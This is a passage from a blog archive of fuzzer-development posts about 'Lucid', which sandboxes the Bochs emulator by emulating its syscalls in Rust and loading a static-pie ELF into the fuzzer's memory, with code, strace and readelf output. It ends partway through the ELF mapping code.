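The `BochsExit::try_from` conversion used in lucid_handler isn’t shown in this post. A minimal sketch of how such a conversion could look is below; the enum name `ExitSketch` and the discriminant value 0 are assumptions, and the real value has to match whatever the SYSCALL constant is on the Musl side.

```rust
use std::convert::TryFrom;

// Hypothetical exit-reason enum; the discriminant is an assumed value
#[derive(Debug, PartialEq, Clone, Copy)]
enum ExitSketch {
    Syscall = 0,
}

impl TryFrom<i32> for ExitSketch {
    type Error = ();

    // Reject anything that is not a known exit reason instead of guessing,
    // since the raw value arrives straight from a register
    fn try_from(value: i32) -> Result<Self, Self::Error> {
        match value {
            0 => Ok(ExitSketch::Syscall),
            _ => Err(()),
        }
    }
}
```

Going through a fallible conversion means a corrupted r14 shows up as an error we can bail out on rather than as an invalid enum value.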

Let’s see how we handle syscalls.

Implementing Syscalls

When we run the test program normally, not under Lucid, we get the following output:

Argument count: 1
Args:
   -./test
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0

And when we run it with strace, we can see what syscalls are made:

execve("./test", ["./test"], 0x7ffca76fee90 /* 49 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd53887f5b8) = 0
set_tid_address(0x7fd53887f7a8)         = 850649
ioctl(1, TIOCGWINSZ, {ws_row=40, ws_col=110, ws_xpixel=0, ws_ypixel=0}) = 0
writev(1, [{iov_base="Argument count: 1", iov_len=17}, {iov_base="\n", iov_len=1}], 2Argument count: 1
) = 18
writev(1, [{iov_base="Args:", iov_len=5}, {iov_base="\n", iov_len=1}], 2Args:
) = 6
writev(1, [{iov_base="   -./test", iov_len=10}, {iov_base="\n", iov_len=1}], 2   -./test
) = 11
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="Test alive!", iov_len=11}, {iov_base="\n", iov_len=1}], 2Test alive!
) = 12
nanosleep({tv_sec=1, tv_nsec=0}, 0x7ffc2fb55470) = 0
writev(1, [{iov_base="g_lucid_ctx: 0", iov_len=14}, {iov_base="\n", iov_len=1}], 2g_lucid_ctx: 0
) = 15
exit_group(0)                           = ?
+++ exited with 0 +++

We see that the first two syscalls are involved with process creation. We don’t need to worry about those because our process is already created and loaded in memory. The other syscalls are ones we’ll need to handle, things like set_tid_address, ioctl, and writev. We don’t worry about exit_group yet, as that will be a fatal exit condition because Bochs shouldn’t exit if we’re snapshot fuzzing.

So we can use our saved register bank information to extract the syscall number from rax and dispatch to the appropriate syscall function! You can see that logic here:

// This is where we process Bochs making a syscall. All we need is a pointer to
// the execution context, and we can then access the register bank and all the
// peripheral structures we need
#[allow(unused_variables)]
pub fn syscall_handler(context: *mut LucidContext) {
    // Get a handle to the register bank
    let bank = LucidContext::get_register_bank(context);

    // Check what the syscall number is
    let syscall_no = (*bank).rax;

    // Get the syscall arguments
    let arg1 = (*bank).rdi;
    let arg2 = (*bank).rsi;
    let arg3 = (*bank).rdx;
    let arg4 = (*bank).r10;
    let arg5 = (*bank).r8;
    let arg6 = (*bank).r9;

    match syscall_no {
        // ioctl
        0x10 => {
            //println!("Handling ioctl()...");
            // Make sure the fd is 1, that's all we handle right now?
            if arg1 != 1 {
                println!("Invalid `ioctl` fd: {}", arg1);
                fatal_exit();
            }

            // Check the `cmd` argument
            match arg2 as u64 {
                // Requesting window size
                libc::TIOCGWINSZ => {   
                    // Arg 3 is a pointer to a struct winsize
                    let winsize_p = arg3 as *mut libc::winsize;

                    // If it's NULL, return an error, we don't set errno yet
                    // that's a weird problem
                    // TODO: figure out that whole TLS issue yikes
                    if winsize_p.is_null() {
                        (*bank).rax = usize::MAX;
                        return;
                    }

                    // Deref the raw pointer
                    let winsize = unsafe { &mut *winsize_p };

                    // Set to some constants
                    winsize.ws_row      = WS_ROW;
                    winsize.ws_col      = WS_COL;
                    winsize.ws_xpixel   = WS_XPIXEL;
                    winsize.ws_ypixel   = WS_YPIXEL;

                    // Return success
                    (*bank).rax = 0;
                },
                _ => {
                    println!("Unhandled `ioctl` argument: 0x{:X}", arg2);
                    fatal_exit();
                }
            }
        },
        // writev
        0x14 => {
            //println!("Handling writev()...");
            // Get the fd
            let fd = arg1 as libc::c_int;

            // Make sure it's an fd we handle
            if fd != STDOUT {
                println!("Unhandled writev fd: {}", fd);
                fatal_exit();
            }

            // An accumulator that we return
            let mut bytes_written = 0;

            // Get the iovec count
            let iovcnt = arg3 as libc::c_int;

            // Get the pointer to the iovec
            let mut iovec_p = arg2 as *const libc::iovec;

            // If the pointer was NULL, just return error
            if iovec_p.is_null() {
                (*bank).rax = usize::MAX;
                return;
            }

            // Iterate through the iovecs and write the contents
            green!();
            for i in 0..iovcnt {
                bytes_written += write_iovec(iovec_p);

                // Advance to the next iovec in the array. `iovec_p` already
                // accumulates, so the stride is always exactly one entry
                iovec_p = unsafe { iovec_p.offset(1) };
            }
            clear!();

            // Update return value
            (*bank).rax = bytes_written;
        },
        // nanosleep
        0x23 => {
            //println!("Handling nanosleep()...");
            (*bank).rax = 0;
        },
        // set_tid_address
        0xDA => {
            //println!("Handling set_tid_address()...");
            // Just return Bochs' pid, no need to do anything
            (*bank).rax = BOCHS_PID as usize;
        },
        _ => {
            println!("Unhandled Syscall Number: 0x{:X}", syscall_no);
            fatal_exit();
        }
    }
}
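
The `write_iovec` helper isn't shown above, so here is a minimal sketch of what the `writev` arm needs, assuming we only want to gather each buffer and count the bytes. `IoVec` and `write_iovecs` are hypothetical names (a stand-in for `libc::iovec` so the example builds with just the standard library), and it writes to any `Write` sink rather than straight to stdout. The point is the pointer walk: index from the base with `add(i)` so every step moves exactly one entry.

```rust
use std::io::{self, Write};

/// Hypothetical stand-in for `libc::iovec` (same field order and layout).
#[repr(C)]
pub struct IoVec {
    pub iov_base: *const u8,
    pub iov_len: usize,
}

/// Write every buffer described by `iov[0..iovcnt]` to `out` and return the
/// total number of bytes written.
///
/// # Safety
/// `iov` must point to `iovcnt` valid entries, and each entry must describe
/// `iov_len` readable bytes.
pub unsafe fn write_iovecs<W: Write>(
    out: &mut W,
    iov: *const IoVec,
    iovcnt: usize,
) -> io::Result<usize> {
    let mut bytes_written = 0;

    for i in 0..iovcnt {
        // Always index from the base pointer, one entry per iteration
        let entry = unsafe { &*iov.add(i) };

        // Skip empty entries, their base pointer may be NULL
        if entry.iov_len == 0 {
            continue;
        }

        let buf = unsafe {
            std::slice::from_raw_parts(entry.iov_base, entry.iov_len)
        };
        out.write_all(buf)?;
        bytes_written += buf.len();
    }

    Ok(bytes_written)
}
```

Passing `std::io::stdout()` as the sink would give the behavior the handler wants, and the returned count is what would go back in rax.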

That’s about it! It’s kind of fun acting as the kernel. Right now our test program doesn’t do much, and I bet we’re going to have to figure out how to deal with things like files when running Bochs, but that’s for a different time. Now all there is to do, after setting the return code via rax, is return back to the exit_handler stub and back to Bochs gracefully.

Returning Gracefully

    // Restore the flags
    "popfq",

    // Restore the GPRS
    "mov rax, [r13 + 0x0]",
    "mov rbx, [r13 + 0x8]",
    "mov rcx, [r13 + 0x10]",
    "mov rdx, [r13 + 0x18]",
    "mov rsi, [r13 + 0x20]",
    "mov rdi, [r13 + 0x28]",
    "mov rbp, [r13 + 0x30]",
    "mov rsp, [r13 + 0x38]",
    "mov r8, [r13 + 0x40]",
    "mov r9, [r13 + 0x48]",
    "mov r10, [r13 + 0x50]",
    "mov r11, [r13 + 0x58]",
    "mov r12, [r13 + 0x60]",
    "mov r14, [r13 + 0x70]",
    "mov r15, [r13 + 0x78]",

    // Restore r13 last, it holds the register bank pointer used above
    "mov r13, [r13 + 0x68]",

    // Return execution back to Bochs!
    "ret"

We restore the CPU flags, restore the general purpose registers, and then we simply ret like we’re done with the function call. Don’t forget that we already restored the extended state within lucid_handler before returning from that function.
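
The hard-coded offsets in the stub only work if the register bank is laid out in exactly that order. Here is a small sketch of how that assumption could be checked from the Rust side. The `RegisterBank` below is hypothetical: its field order is inferred from the offsets in the stub (rax at 0x0 through r15 at 0x78), and I use `u64` fields so the layout doesn't depend on the host's pointer width.

```rust
/// Hypothetical register bank, field order inferred from the restore stub.
/// `repr(C)` keeps the fields in declaration order with no reordering.
#[repr(C)]
#[derive(Debug, Default)]
pub struct RegisterBank {
    pub rax: u64, // 0x00
    pub rbx: u64, // 0x08
    pub rcx: u64, // 0x10
    pub rdx: u64, // 0x18
    pub rsi: u64, // 0x20
    pub rdi: u64, // 0x28
    pub rbp: u64, // 0x30
    pub rsp: u64, // 0x38
    pub r8: u64,  // 0x40
    pub r9: u64,  // 0x48
    pub r10: u64, // 0x50
    pub r11: u64, // 0x58
    pub r12: u64, // 0x60
    pub r13: u64, // 0x68
    pub r14: u64, // 0x70
    pub r15: u64, // 0x78
}

/// Byte offset of `field` inside `bank`. `field` must be a reference to one
/// of `bank`'s own members.
pub fn field_offset(bank: &RegisterBank, field: &u64) -> usize {
    (field as *const u64 as usize) - (bank as *const RegisterBank as usize)
}
```

A handful of assertions like `field_offset(&bank, &bank.rsp) == 0x38` at startup would catch the struct and the assembly drifting apart after a refactor.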

Conclusion

And just like that, we have an infrastructure that is capable of handling context switches from Bochs to the fuzzer. It will no doubt change and need to be refactored, but the ideas will remain similar. We can see the output below demonstrates the test program running under Lucid with us handling the syscalls ourselves:

[08:15:56] lucid> Loading Bochs...
[08:15:56] lucid> Bochs mapping: 0x10000 - 0x18000
[08:15:56] lucid> Bochs mapping size: 0x8000
[08:15:56] lucid> Bochs stack: 0x7F8A50FCF000
[08:15:56] lucid> Bochs entry: 0x11058
[08:15:56] lucid> Creating Bochs execution context...
[08:15:56] lucid> Starting Bochs...
Argument count: 4
Args:
   -./bochs
   -lmfao
   -hahahah
   -yes!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
g_lucid_ctx: 0x55f27f693cd0
Unhandled Syscall Number: 0xE7
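
That last line is expected: 0xE7 is 231, which is exit_group on x86-64 Linux, the one syscall we decided to treat as fatal for now. As the list of handled syscalls grows, the magic numbers in the `match` could get names. This is only a sketch of one way to do that; the `Syscall` enum and `from_number` are hypothetical and not part of Lucid.

```rust
/// The x86-64 Linux syscalls that have shown up so far, by syscall number.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Syscall {
    Ioctl,         // 0x10 (16)
    Writev,        // 0x14 (20)
    Nanosleep,     // 0x23 (35)
    SetTidAddress, // 0xDA (218)
    ExitGroup,     // 0xE7 (231)
}

impl Syscall {
    /// Translate the raw value from rax, `None` means we have no handler
    /// and no name for it yet.
    pub fn from_number(n: usize) -> Option<Self> {
        match n {
            0x10 => Some(Syscall::Ioctl),
            0x14 => Some(Syscall::Writev),
            0x23 => Some(Syscall::Nanosleep),
            0xDA => Some(Syscall::SetTidAddress),
            0xE7 => Some(Syscall::ExitGroup),
            _ => None,
        }
    }
}
```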

Next Up?

Next we will compile Bochs against Musl and work on getting it to work. We’ll need to implement all of its syscalls as well as get it running a test target that we’ll want to snapshot and run over and over. So the next blogpost should be a Bochs that is syscall-sandboxed snapshotting and rerunning a hello world type target. Until then!

Fuzzer Development 1: The Soul of a New Machine

2023-11-04T00:00:00+00:00

Introduction && Credit to Gamozolabs

For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and free time, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard-to-fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.

One approach is to lobotomize the target such that you can isolate a small subset of the target that you find “interesting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though. In an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this “interesting” target logic. The lobotomy approach greatly reduces the amount of target state we can explore. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.

Another approach is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that we are able to explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the “real-world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But, I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.

And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer on top of it, I revisited the stream in which gamozolabs (Brandon Falk) reviewed the Nyx paper. It’s a great stream: the Nyx authors were present in Twitch chat, so there were some good back and forths, and the stream really highlights what an amazing utility Nyx is for fuzzing. But something else besides Nyx piqued my interest during the stream! Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.

This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:

it is relatively simple in its design,
it allows for almost endless introspection utilities to be added,
it lends itself well to iterative development cycles,
it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),
it can fuzz the Linux Kernel,
it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),
it is pretty unique in its design compared to open source fuzzing tools that exist,
it can be designed from scratch to work well with existing flexible tooling such as LibAFL,
there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,
it can be made to be portable, i.e., there is nothing stopping us from running this fuzzer on Windows instead of just Linux,
it will allow me to do a lot of learning and low-level computing research.

So all things considered, this seemed like the ideal project to implement on the blog. I reached out to Gamozo to make sure he’d be ok with it, as I didn’t want to be seen as clout chasing off of his ideas, and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content, and we’re off to developing the fuzzer.

Also huge shoutout to @is_eqv and @ms_s3c at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.

Another huge shoutout to @Kharosx0 for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.

Misc

Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.

I’ve decided to name the project “Lucid” for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.

Bochs

What is Bochs? Good question. Bochs is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it’s a JIT-less, smaller, less-complex emulation tool similar to QEMU but with far fewer use cases and much lower performance. Instead of taking QEMU’s approach of “let’s emulate anything and everything and do it with good performance”, Bochs has taken the approach of “let’s emulate an entire x86 system 100% in software without worrying about performance for the most part”. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect many code changes or rapid development; the last release was over 2 years ago.

Fuzzer Architecture

This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a “fuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.

Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our “fuzzer” process. In an effort to isolate Bochs from the user’s OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as CPUID or something similar. I actually haven’t given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.

Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.

So in general, this is how our fuzzing setup should look:

In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.

Loading an ELF in Memory

To make loading Bochs into memory as simple as possible, I’ve chosen to compile Bochs as a -static-pie ELF. This means that the built ELF has no expectations about where it is loaded. In its _start routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a -static-pie test program and make sure we can do that correctly.

In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    printf("Argument count: %d\n", argc);
    printf("Args:\n");
    for (int i = 0; i < argc; i++) {
        printf("   -%s\n", argv[i]);
    }

    size_t iters = 0;
    while (1) {
        printf("Test alive!\n");
        sleep(1);
        iters++;

        if (iters > 5) { return 0; }
    }
}

Remember, at this point we don’t sandbox our loaded program at all, all we’re trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that aren’t real issues if we jump straight into executing Bochs at this point.

So compiling the test program and examining it with readelf -l, we can see that there is actually a DYNAMIC segment, likely because of the relocations that need to be performed during the aforementioned _start routine.

dude@lol:~/lucid$ gcc test.c -o test -static-pie
dude@lol:~/lucid$ file test
test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
dude@lol:~/lucid$ readelf -l test

Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   10     
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got

So what portions of this ELF image do we actually care about for our loading purposes? We probably don’t need most of this information to simply get the ELF loaded and running. At first, I didn’t know what I needed so I just parsed all of the ELF headers.

Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.

ELF Headers

I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:

// Constituent parts of the Elf
#[derive(Debug)]
pub struct ElfHeader {
    pub entry: u64,
    pub phoff: u64,
    pub shoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
    pub shentsize: u16,
    pub shnum: u16,
    pub shrstrndx: u16,
}

We really care about a few of these struct members. For one, we definitely need to know the entry, this is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about phoff. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with phoff, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where phnum and phentsize come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.
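
To make that concrete, here is a minimal sketch of pulling just those four fields out of the raw file bytes and turning them into the file offset of each Program Header. It is not the parser from the repository. `LoaderHeader`, `parse_loader_header`, and `program_header_offsets` are names I made up for the example, and the byte offsets (0x18, 0x20, 0x36, 0x38) are the standard positions of e_entry, e_phoff, e_phentsize, and e_phnum in a little-endian 64-bit ELF header.

```rust
/// Hypothetical trimmed-down header: only what the loader needs.
#[derive(Debug, PartialEq)]
pub struct LoaderHeader {
    pub entry: u64,
    pub phoff: u64,
    pub phentsize: u16,
    pub phnum: u16,
}

// Read a little-endian u16, `None` if the slice is too short
fn read_u16(data: &[u8], off: usize) -> Option<u16> {
    let mut raw = [0u8; 2];
    raw.copy_from_slice(data.get(off..off + 2)?);
    Some(u16::from_le_bytes(raw))
}

// Read a little-endian u64, `None` if the slice is too short
fn read_u64(data: &[u8], off: usize) -> Option<u64> {
    let mut raw = [0u8; 8];
    raw.copy_from_slice(data.get(off..off + 8)?);
    Some(u64::from_le_bytes(raw))
}

pub fn parse_loader_header(data: &[u8]) -> Option<LoaderHeader> {
    // Magic bytes, then EI_CLASS == 2 (64-bit) and EI_DATA == 1 (LSB)
    if !data.starts_with(b"\x7fELF") { return None; }
    if *data.get(4)? != 2 || *data.get(5)? != 1 { return None; }

    Some(LoaderHeader {
        entry: read_u64(data, 0x18)?,
        phoff: read_u64(data, 0x20)?,
        phentsize: read_u16(data, 0x36)?,
        phnum: read_u16(data, 0x38)?,
    })
}

/// File offset of every Program Header: base + index * entry size
pub fn program_header_offsets(hdr: &LoaderHeader) -> Vec<u64> {
    (0..hdr.phnum as u64)
        .map(|i| hdr.phoff + i * hdr.phentsize as u64)
        .collect()
}
```

For the test binary above (12 program headers starting at offset 64, each 56 bytes as is standard for 64-bit ELF), the offsets run from 64 up to 64 + 11 * 56.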

A single program header, ie, a single entry in the array, can be synthesized into the following data structure:

#[derive(Debug)]
pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub paddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64, 
}

These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type LOAD, as these segments are the ones we have to account for when loading the ELF image. Take our readelf output for example:

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000

We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:

Flags describes the memory permissions this segment should have, we have 3 distinct memory protection schemes READ, READ | EXECUTE, and READ | WRITE
Offset describes how far into the physical file contents we can expect to find this segment
PhysAddr we don’t much care about
VirtAddr the virtual address this segment should be loaded at, you can tell that the first segment value for this is 0x0000000000000000 which means that it has no expectations about where it’s to be loaded.
MemSiz how large the segment should be in virtual memory
Align how to align the segments in virtual memory

For our very simplistic use-case of only loading a -static-pie ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.
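
As a sketch of how one of those table entries maps onto the `ProgramHeader` struct, here is a small parser for a single 56-byte entry plus the `is_load` check. The field offsets are the standard 64-bit ELF ones (note that flags comes right after type in the 64-bit layout). The constants `PT_LOAD` and `PHDR_SIZE` and the helper names are mine, and this may well differ from how the repository does it.

```rust
/// Segment type value for loadable segments
pub const PT_LOAD: u32 = 1;

/// Size of one Program Header entry in a 64-bit ELF
pub const PHDR_SIZE: usize = 56;

#[derive(Debug)]
pub struct ProgramHeader {
    pub typ: u32,
    pub flags: u32,
    pub offset: u64,
    pub vaddr: u64,
    pub paddr: u64,
    pub filesz: u64,
    pub memsz: u64,
    pub align: u64,
}

// Little-endian readers, callers guarantee the slice is long enough
fn le_u32(b: &[u8], off: usize) -> u32 {
    let mut raw = [0u8; 4];
    raw.copy_from_slice(&b[off..off + 4]);
    u32::from_le_bytes(raw)
}

fn le_u64(b: &[u8], off: usize) -> u64 {
    let mut raw = [0u8; 8];
    raw.copy_from_slice(&b[off..off + 8]);
    u64::from_le_bytes(raw)
}

impl ProgramHeader {
    /// Parse one table entry, `None` if fewer than 56 bytes were given
    pub fn parse(entry: &[u8]) -> Option<Self> {
        if entry.len() < PHDR_SIZE { return None; }

        Some(ProgramHeader {
            typ: le_u32(entry, 0x00),
            flags: le_u32(entry, 0x04),
            offset: le_u64(entry, 0x08),
            vaddr: le_u64(entry, 0x10),
            paddr: le_u64(entry, 0x18),
            filesz: le_u64(entry, 0x20),
            memsz: le_u64(entry, 0x28),
            align: le_u64(entry, 0x30),
        })
    }

    /// Only LOAD segments need to end up in memory
    pub fn is_load(&self) -> bool {
        self.typ == PT_LOAD
    }
}
```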

Loading the ELF

Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.

The first thing we need to do is calculate the size of the virtual memory that we need in order to load the ELF, based on the combined size of the segments that are marked LOAD. We also have to keep in mind that there is some padding after segments that don’t end on a page boundary, so to do this, I used the following logic:

// Read the executable file into memory
let data = read(BOCHS_IMAGE).map_err(|_| LucidErr::from(
    "Unable to read binary data from Bochs binary"))?;

// Parse ELF 
let elf = parse_elf(&data)?;

// We need to iterate through all of the loadable program headers and 
// determine the size of the address range we need
let mut mapping_size: usize = 0;
for ph in elf.program_headers.iter() {
    if ph.is_load() {
        let end_addr = (ph.vaddr + ph.memsz) as usize;
        if mapping_size < end_addr { mapping_size = end_addr; }
    }
}

// Round the mapping up to a page
if mapping_size % PAGE_SIZE > 0 {
    mapping_size += PAGE_SIZE - (mapping_size % PAGE_SIZE);
}
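
As a quick sanity check of that sizing logic, here is the same calculation as a standalone function, fed with the four LOAD segments from the readelf output earlier. `mapping_size` is a hypothetical helper that takes `(vaddr, memsz)` pairs, and I'm assuming `PAGE_SIZE` is 0x1000.

```rust
/// Assumed page size for the example
pub const PAGE_SIZE: usize = 0x1000;

/// Given `(vaddr, memsz)` for each LOAD segment, return the size of one
/// contiguous mapping that holds all of them, rounded up to a whole page.
pub fn mapping_size(segments: &[(usize, usize)]) -> usize {
    // The mapping has to reach the highest end address of any segment
    let end = segments
        .iter()
        .map(|&(vaddr, memsz)| vaddr + memsz)
        .max()
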